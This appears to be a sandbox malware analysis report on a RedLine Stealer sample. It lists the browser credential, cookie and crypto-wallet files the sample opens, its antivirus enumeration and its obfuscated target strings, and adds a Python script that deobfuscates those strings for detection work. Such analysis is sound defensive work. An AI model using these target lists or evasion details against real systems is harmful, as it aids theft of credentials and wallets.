                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Users\user\AppData\Roaming\1234.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\1234.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_00000001400C22A8 GetLocalTime,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_000000014004F760 GetComputerNameW,GetUserNameW,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140001270 GetModuleHandleW,GetProcAddress,GetVersionExW,
Source: C:\Users\user\AppData\Roaming\1234.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\1234.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\1234.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\1234.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\1234.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\1234.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\1234.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match | File source: 2.2.1234.exe.43e5a60.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.1234.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.1234.exe.43e5a60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.srvs.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.382545912.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.306824778.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
Source: Yara match | File source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
Source: Yara match | File source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: ElectrumRule
Source: 1234.exe, 0000000F.00000002.385654345.0000000002B23000.00000004.00000001.sdmp | String found in binary or memory: JaxxxLiberty
Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpath
Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: ExodusRule
Source: srvs.exe | String found in binary or memory: set_UseMachineKeyStore
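The long memory string above is not a corrupted dump: the wallet, browser and VPN paths are stored with a junk token spliced into each word ("coMANGOokies.sqMANGOlite", "waasflleasft.datasf", "PasswString.Removeord") and the token is removed at runtime, so the cleartext never sits in the binary for a static scanner to match. The following script is an added example for this report, not code from the sample or from Joe Sandbox; the token list is inferred from the fragments on this page and is an assumption, not a documented constant of the family. The caveat it encodes: apply the removal per fragment, because a three-letter token such as "Win" stripped from the whole blob would also destroy legitimate strings like the "Win32_Process" WMI query that sits in the same dump.

```python
"""Strip junk tokens from split strings carved out of the RedLine memory dump.

Added example for this sandbox report; not the sample's own code. The junk tokens
below were read off the page's "String found in binary or memory" line and are an
assumption about this build, not a documented RedLine constant.
"""

# Longer tokens first, so "Replace" is not removed from "String.Replace" before
# the longer token has had its chance to match.
JUNK_TOKENS = sorted(
    ["MANGO", "asf", "Win", "Def", "Handler", "File.IO", "Environment",
     "String.Remove", "String.Replace", "string.Replace", "Replace"],
    key=len, reverse=True,
)


def deobfuscate(fragment: str, tokens=JUNK_TOKENS) -> str:
    """Remove every junk token from one carved fragment.

    Apply per fragment, never to a whole memory region: short tokens such as
    "Win" or "Def" also occur inside legitimate strings ("Win32_Process",
    "Default") and would be stripped from them too.
    """
    out = fragment
    for token in tokens:
        out = out.replace(token, "")
    return out


# Fragments copied verbatim from the report's memory string (constructed input
# for this example). Comments give the artefact each one points at.
OBSERVED = [
    "coMANGOokies.sqMANGOlite",                      # Firefox cookie store
    "waasflleasft.datasf",                           # Bitcoin Core wallet file
    "PasswString.Removeord",                         # FileZilla config XPath
    "%USERPEnvironmentROFILE%",                      # environment variable
    "coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOx",  # Jaxx Liberty data folder
    "NWinordVWinpn.eWinxe",                          # NordVPN process name
    "OpHandlerenVPHandlerN ConHandlernect",          # OpenVPN Connect profile dir
    "NoDefrdDefVPNDef",                              # NordVPN
    "TReplaceokReplaceenReplaces.tReplacext",        # Discord/Telegram token file
    "*.vstring.Replacedf",                           # Steam .vdf config files
    r"//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.Removee",
]


def recover_targets(fragments=OBSERVED) -> dict:
    """Map each obfuscated fragment to its cleartext for hunting or YARA lists."""
    return {f: deobfuscate(f) for f in fragments}


def junk_token_hits(blob: str, tokens=JUNK_TOKENS) -> dict:
    """Count candidate tokens in a carved string; tokens that recur inside
    otherwise readable words are the ones the sample strips at runtime."""
    return {t: blob.count(t) for t in tokens if blob.count(t)}


if __name__ == "__main__":
    for obf, clear in recover_targets().items():
        print(f"{obf!r:75} -> {clear!r}")
```

The recovered names (cookies.sqlite, wallet.dat, com.liberty.jaxx, NordVpn.exe, Tokens.txt, *.vdf, the FileZilla `//setting[@name=\Password\]/value` XPath) are what the wallet-theft and credential-theft signatures further down are detecting on disk; a YARA rule written on the split form ("coMANGOokies") will match this build only, while one written on the cleartext will match nothing in the binary at all.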
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Roaming\1234.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\1234.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\srvs.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: Nb2HQZZDIf.exe | Binary or memory string: WIN_XP
Source: Nb2HQZZDIf.exe, 00000000.00000002.308759798.00000001400DD000.00000040.00020000.sdmp | Binary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowInputThenPlayLogoffSingle1.1.23.05\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003%04hXcomspecAppStartingArrowCrossIBeamNoUncheckChooseChooseStringEnabledVisibleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceLineCountCurrentLineCurrentColadvapi32RunAs: Missing advapi32.dll.CreateProcessWithLogonWCreateProcessWithLogonW.0.0.0.0&CombowininetInternetOpenWInternetOpenUrlWInternetCloseHandleInternetReadFileExAInternetReadFilewbThe maximum number of Folder Dialogs has been reached.Select Folder - %sshell32SHEmptyRecycleBinW%u.%u.%u.%u\*.*SeShutdownPrivilegeCreateToolhelp32SnapshotProcess32FirstWProcess32NextWComObjTypenameiidNo valid COM object!0x%08X -
Source: Nb2HQZZDIf.exe | Binary or memory string: WIN_VISTA
Source: Nb2HQZZDIf.exe | Binary or memory string: WIN_7
Source: Nb2HQZZDIf.exe | Binary or memory string: WIN_8
Source: Nb2HQZZDIf.exe | Binary or memory string: WIN_8.1
Source: Yara match | File source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
Source: Yara match | File source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY

                      Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match | File source: 2.2.1234.exe.43e5a60.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.1234.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.1234.exe.43e5a60.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.srvs.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.382545912.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.306824778.00000000042C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
Source: Yara match | File source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1234.exe PID: 2524, type: MEMORY
Source: Yara match | File source: Process Memory Space: srvs.exe PID: 5088, type: MEMORY
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140017E10 Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,RtlDeleteCriticalSection,OleUninitialize,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140058440 RemoveClipboardFormatListener,ChangeClipboardChain,
Source: C:\Users\user\Desktop\Nb2HQZZDIf.exe | Code function: 0_2_0000000140018920 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,

                      Mitre Att&ck Matrix

Techniques per tactic column, in the order the matrix lists them (the digits that follow a technique name are the report's own annotations, kept as extracted):

Initial Access: Spearphishing Link1, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation221, Native API1, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron
Privilege Escalation: Exploitation for Privilege Escalation1, Access Token Manipulation1, Process Injection112, Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows), Cron
Defense Evasion: Disable or Modify Tools1, Deobfuscate/Decode Files or Information1, Obfuscated Files or Information3, Software Packing23, Timestomp1, Masquerading1, Virtualization/Sandbox Evasion551, Access Token Manipulation1, Process Injection112, Invalid Code Signature, Right-to-Left Override
